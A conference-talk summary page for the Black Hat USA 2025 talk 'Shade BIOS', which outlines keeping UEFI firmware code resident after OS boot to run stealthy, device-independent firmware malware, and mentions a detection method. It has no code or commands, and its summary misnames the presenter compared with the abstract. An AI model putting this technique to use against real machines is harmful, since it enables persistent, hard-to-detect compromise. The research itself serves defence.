DefenseCybersecurity

Black Hat USA 2025 | Shade BIOS: Unleashing the Full Stealth of UEFI Malware

Black Hat
Black HatMar 17, 2026

Why It Matters

Shade BIOS gives attackers a stealthy, hardware‑agnostic foothold below the OS, forcing enterprises to rethink firmware security strategies.

Key Takeaways

  • Existing UEFI malware depends on OS or hardware specifics.
  • Shade BIOS retains UEFI code in memory after boot.
  • Runtime DXE modules enable pure BIOS‑level malicious actions.
  • Hooking GetMemoryMap reclassifies boot services as runtime services.
  • Technique bypasses OS security and reduces device‑specific implementation.

Summary

At Black Hat USA 2025, Kazuk Kimatsu of FFR Security presented “Shade BIOS,” a method for extending UEFI firmware functionality into runtime to create fully stealthy BIOS‑level malware.

He explained that today’s UEFI bootkits and SMM backdoors are limited by either OS dependence—requiring driver hooks and updates for each OS version—or hardware dependence, needing device‑specific code. With platform protections such as SMM isolation, many existing approaches are losing effectiveness.

Kimatsu demonstrated how retaining EFI boot‑service regions as runtime services, by hooking the GetMemoryMap call and reclassifying them, allows the firmware to stay resident after the OS loads. He also described solutions for memory allocation, identity‑mapped paging, variable handling, and device reinitialization, citing examples like Dell PowerEdge and HP ProLiant backdoors that previously suffered from narrow target scopes.

If adopted, Shade BIOS could enable pure firmware malware that operates independently of OS defenses and without needing device‑specific drivers, raising the threat level for national‑security systems and cloud providers and prompting a reassessment of firmware‑level security controls.

Original Description

UEFI security has been gaining significant attention, especially in the context of national security and cloud security, due to its high stealth capabilities and strong privileges.
However, existing UEFI malware has only scratched the surface of what BIOS can do. They all eventually perform malbehaviors in userland or kernel and are dependent on OS-level security after all. There is some research on SMM backdoors that are purely BIOS implemented, but these implementations tend to be device dependent, resulting in low-versatility backdoors that only work on a specific PC. Moreover, with the current trends of SMM deprivileging, they won't be able to function anymore.
We propose the concept "pure-BIOS malware", which operates completely independent from OS-level security and performs malbehaviors without device dependence at runtime. Then, we will introduce Shade BIOS, which made this possible. Shade BIOS operates like an attacker-exclusive OS by running BIOS environment, which would normally lose its functionality after OS boot, in the shadow of OS at runtime.
In this talk, we dive into the technical details of Shade BIOS. Moreover, considering the latest trends in BIOS security, such as SMM deprivileging, we will take a broad perspective on BIOS and examine the optimal entity for pure-BIOS malware. As a starting point for detecting pure-BIOS malware, we will also demonstrate a practical method for detecting Shade BIOS.
By:
Kazuki Matsuo | Security Researcher, FFRI Security, Inc.
Presentation Materials Available at:

Comments

Want to join the conversation?

Loading comments...